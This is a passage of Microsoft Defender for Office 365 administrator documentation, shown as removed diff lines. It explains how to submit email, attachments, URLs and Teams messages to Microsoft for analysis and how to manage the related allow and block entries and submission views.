- - **Never expire**
- - **Specific date**: The maximum value is 30 days from today.
- - **Block entry note (optional)**: Enter optional information about why you're blocking this item.
-
- When you're finished in the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-file-block-page-2.png" alt-text="Choose whether to create a corresponding block entry for the file in the Tenant Allow/Block List." lightbox="../../media/admin-submission-file-block-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the block entry is available on the **Files** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=FileHash>.
-
-### Report questionable URLs to Microsoft
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **URLs** tab.
-
-3. On the **URLs** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. In the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **URL** is selected.
-
- - **URL**: Enter the full URL (for example, `https://www.fabrikam.com/marketing.html`), and then select it in the box that appears. You can enter up to 50 URLs at once.
-
- - **Why are you submitting this URL to Microsoft?**: Select one of the following values:
- - **It appears suspicious**: Select this value if you're unsure and you want a verdict from Microsoft, select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
-
- Select **Next**.
-
- :::image type="content" source="../../media/admin-submission-url-block.png" alt-text="Submit a false negative (bad) URL to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-url-block.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Block this URL**: This option creates a block entry for the URL in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove block entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 30 days from today.
- - **Block entry note (optional)**: Enter optional information about why you're blocking this itme.
-
- When you're finished in the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-url-block-page-2.png" alt-text="Choose whether to create a corresponding block entry for the URL in the Tenant Allow/Block List." lightbox="../../media/admin-submission-url-block-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the block entry is available on the **URL** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=Url>.
-
-### Report good email to Microsoft
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, verify that the **Emails** tab is selected.
-
-3. On the **Emails** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. In the first page of the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **Email** is selected.
-
- - **Add the network message ID or upload the email file**: Select one of the following options:
- - **Add the email network message ID**: The GUID value is available in the **X-MS-Exchange-Organization-Network-Message-Id** header in the message or in the **X-MS-Office365-Filtering-Correlation-Id** header in quarantined messages.
- - **Upload the email file (.msg or .eml)**: Select **Browse files**. In the dialog that opens, find and select the .eml or .msg file, and then select **Open**.
-
- - **Choose at least one recipient who had an issue**: Specify the recipients to run a policy check against. The policy check determines if the email was blocked due to user or organization policies or overrides.
-
- - **Why are you submitting this message to Microsoft?**: Select one of the following values:
- - **It appears clean**: Select this value only when you don't know or you're unsure of the message verdict and you would like to get a verdict from Microsoft. Select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's clean**: In all other cases, select this value after you've already determined the message verdict as clean. Select **Next**.
-
- :::image type="content" source="../../media/admin-submission-email-allow.png" alt-text="Submit a false positive (good) email to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-email-allow.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Allow this message**: This option creates an allow entry for the elements of the message in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove allow entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
-
- For spoofed senders, this value is meaningless, because entries for spoofed senders never expire.
-
- - **Allow entry note (optional)**: Enter optional information about why you're allowing this item. For spoofed senders, any value you enter here isn't shown in the allow entry on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-
- When you're finished on the second page of the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-email-allow-page-2.png" alt-text="Choose whether to create a corresponding allow entry for the elements of the message in the Tenant Allow/Block List." lightbox="../../media/admin-submission-email-block-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the associated allow entries appear on the **Domains & addresses**, **Spoofed senders**, **URLs**, or **Files** tabs on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList>.
-
-> [!IMPORTANT]
->
-> - Allow entries are added during mail flow based on the filters that determined the message was malicious. For example, if the sender email address and a URL in the message were determined to be bad, an allow entry is created for the sender (email address or domain) and the URL.
-> - If the sender email address is not found to be malicious by our filtering system, submitting the email message to Microsoft won't create an allow entry in the Tenant Allow/Block List.
-> - When an allowed domain or email address, spoofed sender, URL, or file (_entity_) is encountered again, all filters that are associated with the entity are skipped. For email messages, all other entities are still evaluated by the filtering system before making a decision.
-> - During mail flow, if messages from the allowed domain or email address pass other checks in the filtering stack, the messages are delivered. For example, if a message passes [email authentication checks](email-authentication-about.md), a message from an allowed sender email address are delivered.
-> - By default, allow entries for domains and email addresses exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages from those domains or email addresses are delivered, unless something else in the message is detected as malicious. By default, allow entries for spoofed senders never expire.
-> - For messages that were incorrectly blocked by [domain or user impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365), the allow entry for the domain or sender is not created in the Tenant Allow/Block List. Instead, the domain or sender is added to the **Trusted senders and domains** section in the [anti-phishing policy](anti-phishing-policies-mdo-configure.md#use-the-microsoft-defender-portal-to-modify-anti-phishing-policies) that detected the message.
-> - When you override the verdict in the spoof intelligence insight, the spoofed sender becomes a manual allow or block entry that only appears on the **Spoofed senders** on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>.
-
-### Report good email attachments to Microsoft
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **Email attachments** tab.
-
-3. On the **Email attachments** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. On the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **Email attachment** is selected.
-
- - **File**: Select **Browse files** to find and select the file to submit.
-
- - **Why are you submitting the message to Microsoft?**: Select one of the following values:
- - **It appears clean**: Select this value if you're unsure and you want a verdict from Microsoft, select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's clean**: Select this value if you're sure that the item is clean, and then select **Next**.
-
- :::image type="content" source="../../media/admin-submission-file-allow.png" alt-text="Submit a false positive (good) email attachment to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-file-allow.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Allow this file**: This option creates a allow entry for the file in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove allow entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
- - **Block entry note (optional)**: Enter optional information about why you're blocking this item.
-
- When you're finished on the second page of the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-file-allow-page-2.png" alt-text="Choose whether to create a corresponding allow entry for the file in the Tenant Allow/Block List." lightbox="../../media/admin-submission-file-allow-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the allow entry is available on the **Files** tab on the **Tenant Allow/Block List** page. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
-> [!IMPORTANT]
->
-> - By default, allow entries for files exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those files are delivered, unless something else in the message is detected as malicious.
-> - When the file is encountered again during mail flow, [Safe Attachments](safe-attachments-about.md) detonation or file reputation checks and all other file-based filters are overridden. If the filtering system determines that all other entities in the email message are clean, the message are delivered.
-> - During selection, all file-based filters, including [Safe Attachments](safe-attachments-about.md) detonation or file reputation checks are overridden, allowing user access to the file.
-
-### Report good URLs to Microsoft
-
-For URLs reported as false positives, we allow subsequent messages that contain variations of the original URL. For example, you use the **Submissions** page to report the incorrectly blocked URL `www.contoso.com/abc`. If your organization later receives a message that contains the URL (for example but not limited to: `www.contoso.com/abc`, `www.contoso.com/abc?id=1`, `www.contoso.com/abc/def/gty/uyt?id=5`, or `www.contoso.com/abc/whatever`), the message won't be blocked based on the URL. In other words, you don't need to report multiple variations of the same URL as good to Microsoft.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **URLs** tab
-
-3. On the **URLs** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. In the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **URL** is selected.
-
- - **URL**: Enter the full URL (for example, `https://www.fabrikam.com/marketing.html`), and then select it in the box that appears. You can also provide a top level domain (for example, `https://www.fabrikam.com/*`), and then select it in the box that appears. You can enter up to 50 URL at once.
-
- - **Why are you submitting this URL to Microsoft?**: Select one of the following values:
- - **It appears clean**: Select this value if you're unsure and you want a verdict from Microsoft, select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's clean**: Select this value if you're sure that the item is clean, and then select **Next**.
-
- :::image type="content" source="../../media/admin-submission-url-allow.png" alt-text="Submit a false positive (good) URL to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-url-allow.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Allow this URL**: This option creates an allow entry for the URL in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove block entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
- - **Allow entry note (optional)**: Enter optional information about why you're allowing this item.
-
- When you're finished on the second page of the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-url-allow-page-2.png" alt-text="Choose whether to create a corresponding allow entry for the URL in the Tenant Allow/Block List." lightbox="../../media/admin-submission-url-allow-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the allow entry is available on the **URL** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=Url>.
-
-> [!NOTE]
->
-> - By default, allow entries for URLs exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those URLs are delivered, unless something else in the message is detected as malicious.
-> - When the URL is encountered again during mail flow, [Safe Links](safe-links-about.md) detonation or URL reputation checks and all other URL-based filters are overridden. If the filtering system determines that all other entities in the email message are clean, the message are delivered.
-> - During selection, all URL-based filters, including [Safe Links](safe-links-about.md) detonation or URL reputation checks are overridden, allowing user access to content at the URL.
-
-### Report Teams messages to Microsoft in Defender for Office 365 Plan 2
-
-> [!TIP]
-> [Submission of Teams message to Microsoft](submissions-teams.md) is currently in Preview, isn't available in all organizations, and is subject to change.
-
-In Microsoft 365 organizations that have Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5), You can't submit Teams messages from the **Teams messages** tab on the **Submissions** page. The only way to submit a Teams message to Microsoft for analysis is to submit a user reported Teams message from the **User reported** tab as described in the [Submit user reported messages to Microsoft for analysis](#submit-user-reported-messages-to-microsoft-for-analysis) section later in this article.
-
-The entries on the **Teams messages** tab are the result of submitting user reported Teams message to Microsoft. For more information, see the [View converted admin submissions](#view-converted-admin-submissions) section later in this article.
-
-### View email admin submissions to Microsoft
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-On the **Submissions** page, verify that the **Emails** tab is selected.
-
-On the **Emails** tab, you can quickly filter the view by selecting one of the available quick filters:
--- **Pending**-- **Completed**--
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Submission name**<sup>\*</sup>-- **Sender**<sup>\*</sup>-- **Recipient**-- **Submitted by**<sup>\*</sup>-- **Date submitted**<sup>\*</sup>-- **Reason for submitting**<sup>\*</sup>-- **Status**<sup>\*</sup>-- **Result**<sup>\*</sup>-- **Delivery/Block reason**-- **Submission ID**-- **Network Message ID**-- **Direction**-- **Sender IP**-- **Bulk compliant level (BCL)**-- **Destination**-- **Policy action**-- **Phish simulation**-- **Tags**<sup>\*</sup>: For more information about user tags, see [User tags](user-tags-about.md).-- **Action**-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Reason**-- **Status**-- **Result**-- **Tags**-
-To ungroup the entries, select **None**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Date submitted**: **Start date** and **End date** values.-- **Submission ID**: A GUID value that's assigned to every submission.-- **Network Message ID**-- **Sender**-- **Recipient**-- **Submission name**-- **Submitted by**-- **Reason for submitting**: Any of the following values:
- - **Not junk**
- - **Appears clean**
- - **Appears suspicious**
- - **Phish**
- - **Malware**
- - **Spam**.
-- **Status**: **Pending** and **Completed**.-- **Tags**: **All** or select [user tags](user-tags-about.md) from the dropdown list.-
-When you're finished on the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of entries to a CSV file.
-
-#### View email admin submission details
-
-If you select an entry on the **Emails** tab of the **Submissions** page by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the message Subject value.-- Any user tags that are assigned to the recipients of the message (including the Priority account tag). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md)-- In Defender for Office 365, the actions that are available at the top of the flyout are described in the [Actions for admin submissions in Defender for Office 365](#actions-for-admin-submissions-in-defender-for-office-365) section.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the details flyout are related to email message submissions:
--- **Result details** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should not have been blocked**
- - **Allowed due to user overrides**
- - **Allowed due to a rule**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **View Exchange mail flow rules (transport rules)**
- - **View this message in Explorer** (Threat Explorer or Real-time detections in Defender for Office 365 only)
- - **Search for similar messages in Explorer** (Threat Explorer or Real-time detections in Defender for Office 365 only)
--- **Submission details** section:
- - **Date submitted**
- - **Submission name**
- - **Submission type**: The value is **Email**.
- - **Reason for submitting**
- - **Submission ID**
- - **Submitted by**
- - **Submission status**
--- **Allow details** section: Available only for email submissions where the **Result** value is **Allowed due to user overrides** or **Allowed to a rule**: Contains the **Name** (email address) and **Type** (**Sender**) values.-
-The rest of the details flyout contains the **Delivery details**, **Email details**, **URLs**, and **Attachments** sections that are part of the _Email summary panel_. For more information, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-When you're finished in the details flyout, select **Close**.
-
-### View Teams admin submissions to Microsoft in Defender for Office 365 Plan 2
-
-> [!TIP]
-> [Submission of Teams message to Microsoft](submissions-teams.md) is currently in Preview, isn't available in all organizations, and is subject to change.
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Submissions** page at **Actions & submissions** \> **Submissions**. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-On the **Submissions** page, select the **Teams messages** tab.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Submission name**<sup>\*</sup>-- **Sender**<sup>\*</sup>-- **Date submitted**<sup>\*</sup>-- **Reason for submitting**<sup>\*</sup>-- **Submitted by**-- **Status**<sup>\*</sup>-- **Result**<sup>\*</sup>-- **Recipient**-- **Submission ID**-- **Teams message ID**-- **Destination**-- **Phish simulation**-- **Tags**<sup>\*</sup>: For more information about user tags, see [User tags](user-tags-about.md).-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Reason**-- **Status**-- **Result**-- **Tags**-
-To ungroup the entries, select **None**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Date submitted**: **Start date** and **End date**.-- **Submission ID**: A GUID value that's assigned to every submission.-- **Teams message ID**-- **Sender**-- **Recipient**-- **Teams message**-- **Submitted by**-- **Reason for submitting**: Any of the following values:
- - **Not junk**
- - **Appears clean**
- - **Appears suspicious**
- - **Phish**
- - **Malware**
-- **Status**: **Pending** and **Completed**.-- **Tags**: **All** or select [user tags](user-tags-about.md) from the dropdown list.-
-When you're finished on the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of entries to a CSV file.
-
-#### View Teams admin submission details
-
-If you select an entry on the **Teams messages** tab of the **Submissions** page by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the subject or the first 100 characters of the Teams message.-- The current message verdict.-- The number of links in the message.-- :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**. An alert is triggered when an admin submission is created or updated. Selecting this action takes you to the details of the alert.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the details flyout are related to Teams submissions:
--- **Submission results** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should have been blocked**
- - **We did not receive the submission, please fix the problem and resubmit**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **View Exchange mail flow rules (transport rules)**
--- **Submission details** section:
- - **Date submitted**
- - **Submission name**
- - **Submission type**: The value is **Teams**
- - **Reason for submitting**
- - **Submission ID**
- - **Submitted by**
- - **Submission status**
-
-The rest of the details flyout contains the **Message details**, **Sender**, **Participants**, **Channel details**, and **URLs** sections that are part of the _Teams message entity panel_. For more information, see [The Teams mMessage entity panel in Microsoft Defender for Office 365 Plan 2](teams-message-entity-panel.md).
-
-When you're finished in the details flyout, select **Close**.
-
-### View email attachment admin submissions to Microsoft
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Submissions** page at **Actions & submissions** \> **Submissions**. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-On the **Submissions** page, select the **Email attachments** tab.
-
-On the **Email attachments** tab, you can quickly filter the view by selecting one of the available quick filters:
--- **Pending**-- **Completed**--
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Attachment filename**<sup>\*</sup>-- **Date submitted**<sup>\*</sup>-- **Reason for submitting**<sup>\*</sup>-- **Status**<sup>\*</sup>-- **Result**<sup>\*</sup>-- **Filter verdict**-- **Delivery/Block reason**-- **Submission ID**-- **Object ID**-- **Policy action**-- **Submitted by**-- **Tags**<sup>\*</sup>: For more information about user tags, see [User tags](user-tags-about.md).-- **Action**-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Reason**-- **Status**-- **Result**-- **Tags**-
-To ungroup the entries, select **None**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Date submitted**: **Start date** and **End date**.-- **Submission ID**: A GUID value that's assigned to every submission.-- **Attachment filename**-- **Submitted by**-- **Reason for submitting**: Any of the following values:
- - **Not junk**
- - **Appears clean**
- - **Appears suspicious**
- - **Phish**
- - **Malware**
-- **Status**: **Pending** and **Completed**.-- **Tags**: **All** or select [user tags](user-tags-about.md) from the dropdown list.-
-When you're finished on the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of entries to a CSV file.
-
-#### View email attachment admin submission details
-
-If you select an entry on the **Email attachments** tab of the **Submissions** page by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the filename of the attachment.-- The **Status** and **Result** values of the submission.-- :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**. In Defender for Office 365, an alert is triggered when an admin submission is created or updated. Selecting this action takes you to the details of the alert.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the details flyout are related to email attachment submissions:
--- **Result details** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should have been blocked**
- - **Should not have been blocked**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **Block URL/file in Tenant Allow/Block List**
--- **Submission details** section:
- - **Date submitted**
- - **Submission name**
- - **Submission type**: The value is **File**.
- - **Reason for submitting**
- - **Submission ID**
- - **Submitted by**
- - **Submission status**
-
-When you're finished in the details flyout, select **Close**.
-
-### View URL admin submissions to Microsoft
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Submissions** page at **Actions & submissions** \> **Submissions**. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-On the **Submissions** page, select the **URLs** tab.
-
-On the **URLs** tab, you can quickly filter the view by selecting one of the available quick filters:
--- **Pending**-- **Completed**--
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **URL**<sup>\*</sup>-- **Date submitted**<sup>\*</sup>-- **Reason for submitting**<sup>\*</sup>-- **Status**<sup>\*</sup>-- **Result**<sup>\*</sup>-- **Filter verdict**-- **Delivery/Block reason**-- **Submission ID**-- **Object ID**-- **Policy action**-- **Submitted by**-- **Tags**<sup>\*</sup>: For more information about user tags, see [User tags](user-tags-about.md).-- **Action**-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Reason**-- **Status**-- **Result**-- **Tags**-
-To ungroup the entries, select **None**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Date submitted**: **Start date** and **End date**.-- **Submission ID**: A GUID value that's assigned to every submission.-- **URL**-- **Submitted by**-- **Reason for submitting**: Any of the following values:
- - **Not junk**
- - **Appears clean**
- - **Appears suspicious**
- - **Phish**
- - **Malware**
-- **Status**: **Pending** and **Completed**.-- **Tags**: **All** or select [user tags](user-tags-about.md) from the dropdown list.-
-When you're finished on the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of entries to a CSV file.
-
-#### View URL admin submission details
-
-If you select an entry on the **URLs** tab of the **Submissions** page by clicking anywhere in the row other than the check box next to the first column, a details flyout opens.
-
-At the top of the details flyout, the following message information is available:
--- The title of the flyout is the domain of the URL.-- The **Status** and **Result** values of the submission.-- :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**. In Defender for Office 365, an alert is triggered when an admin submission is created or updated. Selecting this action takes you to the details of the alert.-
-> [!TIP]
-> To see details about other submissions without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The remaining sections in the details flyout are related to URL submissions:
--- **Result details** section:
- - **Result**: Contains the **Result** value for the submission. For example:
- - **Should have been blocked**
- - **Should not have been blocked**
- - **Recommended steps for email submissions**: Contains links to related actions. For example:
- - **Block URL/file in Tenant Allow/Block List**
--- **Submission details** section:
- - **Date submitted**
- - **URL**
- - **Submission type**: The value is **URL**.
- - **Reason for submitting**
- - **Submission ID**
- - **Submitted by**
- - **Submission status**
--- **Allows details** or **Block details** sections: Available only for URL submissions where the URL was blocked or allowed: Contains the **Name** (URL domain) and **Type** (**URL**) values.-
-When you're finished in the details flyout, select **Close**.
-
-### Results from Microsoft
-
-The analysis results of the reported item are shown in the details flyout that opens when you select an entry on the **Emails**, **Teams messages**, **Email attachments**, or **URLs** tab of the **Submissions** page:
--- If there was a failure in the sender's email authentication at the time of delivery.-- Information about any policies or overrides that could have affected or overridden the message verdict from filtering system.-- Current detonation results to see if the URLs or files in the message were malicious or not.-- Feedback from graders.-
-If an override or policy configuration was found, the result should be available in several minutes. If there wasn't a problem in email authentication or delivery wasn't affected by an override or policy, the detonation and feedback from graders could take up to a day.
-
-### Actions for admin submissions in Defender for Office 365
-
-In organizations with Microsoft Defender for Office 365 (add-on licenses or included in subscriptions like Microsoft 365 E5 or Microsoft 365 Business Premium), the following actions are available for admin submissions in the details flyout that opens after you select an entry from the list by clicking anywhere in the row other than the check box:
--- :::image type="icon" source="../../medi#whats-on-the-email-entity-page).--- :::image type="icon" source="../../medi#actions-on-the-email-entity-page).--- :::image type="icon" source="../../media/m365-cc-sc-view-alert-icon.png" border="false"::: **View alert**. An alert is triggered when an admin submission is created or updated. Selecting this action takes you to the details of the alert.--- In the **Result details** section, the following links for [Threat Explorer](threat-explorer-real-time-detections-about.md) might also be available, depending on the status and result of the reported item:
- - **View this message in Explorer**: **Emails** tab only.
- - **Search for similar messages in Explorer**: **Emails** tab only.
- - **Search for URL or file**: **Email attachments** or **URL** tabs only.
-
-## Admin options for user reported messages
-
-For email messages, admins can see what users are reporting on the **User reported** tab on the **Submissions** page if the following statements are true:
--- The [user reported settings](submissions-user-reported-messages-custom-mailbox.md) are turned on.-- **Email messages**: You're using supported methods for users to report messages:
- - The [Microsoft Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md).
- - The [built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web).
- - [Supported third-party reporting tools](submissions-user-reported-messages-custom-mailbox.md#options-for-third-party-reporting-tools)
-- **Teams messages**: [User reporting settings for Teams messages](submissions-teams.md#user-reporting-settings-for-teams-messages) is turned on.-
-**Notes**:
